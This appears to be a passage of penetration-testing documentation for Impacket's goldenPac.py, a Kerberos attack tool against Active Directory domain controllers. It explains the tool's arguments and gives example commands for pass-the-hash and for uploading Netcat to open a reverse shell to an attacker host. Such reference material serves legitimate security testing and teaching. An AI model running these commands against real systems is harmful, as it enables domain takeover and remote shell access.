Because it is a Kerberos attack, the remote target and the domain MUST be specified with the FQDN and the attacker machine MUST be time synced with the domain controller.
It has the following generic command line arguments, similar to many other tools:
required positional argument format
-dc-ip: IP address of the domain controller. If omitted, the positional argument's domain part will be used (in that case, it must be a Fully-Qualified-Domain-Name (FQDN)).
-debug: with this flag set, the utility will be more verbose and will possibly print useful information for debug purposes. With this flag set, the utility will also print tracebacks.
-ts: with this flag set, the utility will prepend all output with a timestamp.
It also has the following specific command line arguments:
- positional argument #2: command to execute on the target system (e.g.
'powershell -c "nc.exe attacker_ip listener_port -e cmd.exe"'), or arguments for the uploaded file if the
-coption is used. If omitted,
cmd.exewill be executed via
psexecto open a shell. If
Noneis specified, no command will be executed and only the TGT will be saved for later use.
-target-ip: IP address of the target machine. If omitted, the positional argument's target part will be used. This argument is useful when NetBIOS name resolution request fail.
-c: uploads the specified file on the remote target and executes it with the arguments passed in the positional argument #2.
-w: writes the Golden Ticket at the specified path. Useful with
Nonespecified in the positional argument #2.
# with cleartext credentials
# pass-the-hash (with an NT hash)
goldenPac.py -hashes :'NThash' 'DOMAIN.LOCAL'/'USER'@'DOMAIN_CONTROLLER'
# uploads Netcat and execute a reverse shell
goldenPac.py -c ./nc.exe 'DOMAIN.LOCAL'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' 'attacker_ip listener_port -e cmd.exe'
The utility creates a PAC with the following default groups ids: 513, 512, 520, 518, 519.
There are scenarios where a ticket with a PAC containing these ids wouldn't be enough (see. this). Also, it could be useful to note that as of November 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket will get rejected.